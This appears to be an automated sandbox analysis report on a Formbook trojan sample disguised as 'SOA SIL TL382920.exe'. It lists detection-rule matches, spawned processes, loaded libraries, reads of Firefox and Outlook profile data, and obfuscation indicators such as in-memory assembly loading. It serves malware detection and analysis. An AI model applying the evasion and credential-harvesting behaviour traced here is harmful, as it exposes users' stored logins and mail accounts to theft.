Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SOA SIL TL382920.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.SetAccessControl
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA SIL TL382920.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\replace.exe

File created: C:\Users\user\AppData\Local\Temp\59F79305l7

Jump to behavior

Source: SOA SIL TL382920.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SOA SIL TL382920.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Process created: C:\Users\user\Desktop\SOA SIL TL382920.exe "C:\Users\user\Desktop\SOA SIL TL382920.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: SOA SIL TL382920.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SOA SIL TL382920.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SOA SIL TL382920.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: replace.pdb source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: replace.pdbGCTL source: SOA SIL TL382920.exe, 00000002.00000002.21275498246.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Qpgk.pdbSHA256s source: SOA SIL TL382920.exe
Source:	Binary string: wntdll.pdbUGP source: SOA SIL TL382920.exe, 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21278692852.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21275121390.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SOA SIL TL382920.exe, SOA SIL TL382920.exe, 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000003.21278692852.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.21275121390.0000000002DF7000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.0000000003160000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23446010482.000000000328D000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Qpgk.pdb source: SOA SIL TL382920.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: SOA SIL TL382920.exe, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.3064930.0.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.4149d20.2.raw.unpack, rS62YTDrBiKI0c2yp4.cs	.Net Code: FiqjCAEGLR System.Reflection.Assembly.Load(byte[])
Source: 1.2.SOA SIL TL382920.exe.57c0000.3.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 4.2.replace.exe.378cd14.2.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 5.0.MBLUUsWuClSd.exe.35bcd14.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 5.2.MBLUUsWuClSd.exe.35bcd14.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject

Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01577ACA push edi; ret	1_2_01577AD1
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 1_2_01577AE3 push ebp; ret	1_2_01577AE4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00418066 push ecx; rep ret	2_2_0041808F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401A71 pushfd ; retf	2_2_00401ABE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004032C0 push eax; ret	2_2_004032C2
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004162CC pushad ; ret	2_2_004162CD
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00417B73 push ecx; ret	2_2_00417B74
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00417C09 pushfd ; retf	2_2_00417C0C
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00404D68 push es; retf	2_2_00404D6F
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00413DC3 push edx; retf	2_2_00413DFD
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00414632 push es; iretd	2_2_00414633
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00415757 push edx; ret	2_2_004157E6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00415723 push edx; ret	2_2_004157E6
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00404FCF push 001D5E1Fh; retf	2_2_00404FD4
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_004157E7 push ebx; iretd	2_2_004157EB
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_00401F9C push esp; ret	2_2_00401FAE
Source: C:\Users\user\Desktop\SOA SIL TL382920.exe	Code function: 2_2_018308CD push ecx; mov dword ptr [esp], ecx	2_2_018308D6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031621AD pushad ; retf 0004h	4_2_0316223F
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0316E074 pushfd ; retf	4_2_0316E075
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_0316E060 push eax; retf 0008h	4_2_0316E06D
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031697A1 push es; iretd	4_2_031697A8
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_031908CD push ecx; mov dword ptr [esp], ecx	4_2_031908D6
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C136F push es; iretd	4_2_028C1370
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C3009 pushad ; ret	4_2_028C300A
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028D012D push ebx; retf	4_2_028D012E
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C2460 push edx; ret	4_2_028C2523
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028B1AA5 push es; retf	4_2_028B1AAC
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C48B0 push ecx; ret	4_2_028C48B1
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C4946 pushfd ; retf	4_2_028C4949
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028CBED8 push ecx; retf	4_2_028CBED9
Source: C:\Windows\SysWOW64\replace.exe	Code function: 4_2_028C4DA3 push ecx; rep ret	4_2_028C4DCC

Source: SOA SIL TL382920.exe

Static PE information: section name: .text entropy: 7.985642370115789

Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, NFyHMq8GrX09kSU6fc.cs	High entropy of concatenated method names: 'Q0GBrfIG5V', 'PF1BdoimVi', 'sOsBCrcdwO', 'rbnBXFSt36', 'LmgBnUWekc', 'Jn2BGNoHg4', 'nS3BUj4Mh6', 'BvWBs5iU4s', 'prABoNG7CG', 'fYGBQpfgWy'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, vEMm9TGqkTbSK2DWuX.cs	High entropy of concatenated method names: 'YFbVTqlxw5', 'XH2VxmgvQ0', 'KLdVpTbIFy', 'aHFVB1ZQhc', 'Dw2VH0o0LK', 'WIGp4FhaM4', 'fRCpt5Yru2', 'jaHpSWJQyN', 'bk4pywvOQs', 'eyOpmiRGW6'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, oh8d8J2Z3QMfQxImdTr.cs	High entropy of concatenated method names: 'MpBlrGwNZx', 'IaQld2S42U', 'FAflCyqVj8', 'tQ5lXeyOfw', 'SPWlnVsnjV', 'EIklGHpuQL', 'EkOlUbIxqs', 'rLalsohUp0', 'GBOlokBHRT', 'lkclQLLVpq'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, rS62YTDrBiKI0c2yp4.cs	High entropy of concatenated method names: 'BPTMTPIyDS', 'I4EMRDtROT', 'Y1jMxcebvW', 'CDfMkrBg5s', 'jeiMpbjB07', 'tBfMVOiuBo', 'hUBMBkaGlI', 'FIFMHfWMcG', 'WovMO9MXXe', 'C9KMADpC5X'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, pUEAtE22XMsD0aDaH3F.cs	High entropy of concatenated method names: 'ToString', 'wXb8MlXaJc', 'YsM8jMPuhv', 'nkW8Tu7IHX', 'CXI8RAMmJA', 'kbI8x4mdaq', 'FT48kQmeUC', 'aqw8pSh0VJ', 'F1OjSrh8vqC97vocmP2', 'sJQOL4hWAii6jktb04L'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, RreqsmkbHTMnh2NVRx.cs	High entropy of concatenated method names: 'uShNRYJyVS', 'gY0NxTlhVc', 'q7nNkvAXIP', 'FLuNpiaWNo', 'R6iNV7p7hi', 'VNqNBVo4aD', 'UH8NHCC21i', 'VB9NOqKlXZ', 'O0CNAd5yq6', 'dUFNWfGqEr'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, XhCqR5zmlyqt5yQm3v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Sh1l1FbA40', 'ctml7wUF5c', 'hZUl5u9INh', 'yWalJBwixd', 'fIplNBMD1U', 'oIpll3LPxI', 'Wfll8gMeAP'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, pHwhV20V03y5CCZ9Ef.cs	High entropy of concatenated method names: 'Dispose', 'ATkumqGXpA', 'LHPhaN5Xub', 'NJkEEfr4fk', 'MLxuKrjC6H', 'WRXuzCLtki', 'ProcessDialogKey', 'MfUhvZDZ4S', 'E42huPaMIN', 'vOphhD7Msw'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, sDyThrA2a2XUGkyEDW.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ixVhmg6399', 'aBjhKrx4HD', 'XPQhzyfcqg', 'i2FMvI8PxX', 'ESkMuwIebq', 'lrcMhLiRpg', 'hlnMM7caw7', 'LuTAQDzUFgjZGBpENS'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, FFG4Oq6dFLvXbZlV5u.cs	High entropy of concatenated method names: 'zpjx6X8nd7', 'P60xZISpi9', 'e3pxeKlgZF', 'HQbx9Vpw0R', 'FS3x4xbRRf', 'OcQxt5wSFG', 'puDxS6iAOa', 'cYXxyuSYvS', 'Lssxmr2Feu', 'UT9xK8yIoB'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, ywbAm7qFrfxqBfnsZL.cs	High entropy of concatenated method names: 'MDRuBAUq7J', 'm3HuHf6xVS', 'YlWuAlInbP', 'HlouW48W0Q', 'mLqu7S9V1L', 'Tm0u5yJe0m', 'UbxuEmvE1iRDIu68jw', 'Aa4Uv1ua3q1gt7AqiR', 'loTuuD4Ex4', 'NTFuM04Ug8'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, zclspqvkJLhbYittNv.cs	High entropy of concatenated method names: 'qfDpnOuRND', 'O0ypU5RtBj', 'E7akgIiePV', 'q4okLE0UNn', 'cQkk2Cblu8', 't01kbyJMK2', 'tQwkFOQiWs', 'AMSkPRLWHa', 'PwOkftlkyK', 'UYFkI2Qqv3'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, tUPDfr2gf3XDC7vJa48.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'De386LYfpw', 'tki8ZdyYlg', 'v6e8e0sy54', 'bnV897kYD5', 'NGV84T567O', 'NNh8tsyg9V', 'xyN8SZOP1d'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, IrkVVDF7qxNbVDw9e9.cs	High entropy of concatenated method names: 'QnFBRTP2ye', 'exVBkflBqw', 'EL3BV7fbYd', 'EwgVKL8w8a', 'NCwVzVygMj', 'XhmBvBW2lF', 'dEHBuihDAT', 'Ah6BhpLfgy', 'PdNBMI1rRV', 'VfCBjP5WMg'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, vOKCEEwom9DPq6wCSb.cs	High entropy of concatenated method names: 'faV1sHl9n2', 'M611okeMC9', 'Hs51wOf0pg', 'zho1aBlftu', 'L701LNo2J9', 'Vfc12dUsdr', 'lGy1FYeHDV', 'zYG1PMjv73', 'wGr1IQu9dN', 'CGB1DkVCEv'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, dMqAJ5HbYJvSvNqENx.cs	High entropy of concatenated method names: 'ToString', 'jp55DfH9OV', 'K9d5aRCWCV', 'Ttv5gjdZR9', 'QyB5L4PcPx', 'WMF52VRTll', 'XRi5bkS8xE', 'q6S5Fp03JV', 'eie5PLx1hX', 'TYM5ftYBE9'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, M1h21NiSLROdxSbxpP.cs	High entropy of concatenated method names: 'xuDkXn2hM7', 'zZxkG3NHHo', 'A5rks6eyI5', 'A8xkor3eSU', 'KaBk7Vbro5', 'nylk5DBr89', 'UqlkJKIGu4', 'T9ikNRaAik', 'HfIklnAtD5', 'El7k8WiMvr'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, tA4VCFI8paMxTv4RoO.cs	High entropy of concatenated method names: 'DvLCQAJuQ', 'YbXXhNsB7', 'REVGfrcfr', 'knwUdRx4p', 'D0HoPiHYc', 'GCGQ8tD9L', 'WUxO5DGlAKAZQxQfWX', 'dJcL2vT518F7a14V8N', 'suw4I5AS6ZrHlFnggD', 'zT1NPlKyt'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, h84iwTVuOfwRagKMD4.cs	High entropy of concatenated method names: 'tXJJyuDc66', 'VRCJKQNwHi', 'H8KNvCJ8Aj', 'Y6NNuwtai4', 'j6TJDQTBRE', 'et6JiwAVGd', 'kuVJ3G1sRb', 'YRKJ6i0YDr', 'Bm7JZ7cBl5', 'zPXJeU29DI'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, eZTw0aMcgXfmLQy1ud.cs	High entropy of concatenated method names: 'g0ONwgeITL', 'alYNara338', 'cBxNgLvc86', 'LdONL1Ij0P', 'I20N6TgGL4', 'rfcN2Y8wuK', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, Xpbm3yB50V80TamYNd.cs	High entropy of concatenated method names: 'x11JAxWwZK', 'iRDJWnsGqZ', 'ToString', 'nCtJRtbTWb', 'cH2JxYyQGs', 'GvMJkrH8CI', 'c8dJpAHihI', 'ob8JVlGuhI', 'kewJBqGbr9', 'p89JH8kHCE'
Source: 1.2.SOA SIL TL382920.exe.6d20000.4.raw.unpack, CuFkfr7adGBIK2Wadu.cs	High entropy of concatenated method names: 'rKZldDOwRMjM9PjgaXL', 'w06MLUOmqXuqZQ3r1qX', 'dIvVNeueNY', 'cEEVlKWeOx', 'p82V8F3FTp', 'gFcIiBOSYmeyBaEgtmb', 'n7vTbiOVt1YGl9kMREW'
Source: 1.2.SOA SIL TL382920.exe.42efd00.1.raw.unpack, AnNfyhuSxfOQKhnA04.cs	High entropy of concatenated method names: 'AScluq9xFj', 'ghSlMlbhoZ', 'VQOljRftMm', 'kQZlRFTFpn', 'Bi3lxENYaY', 'obBlpnK25Y', 'A7DlVEEySe', 'TI8NSILC2Q', 'U22Nyt1wBC', 'XhLNmJWtGV'
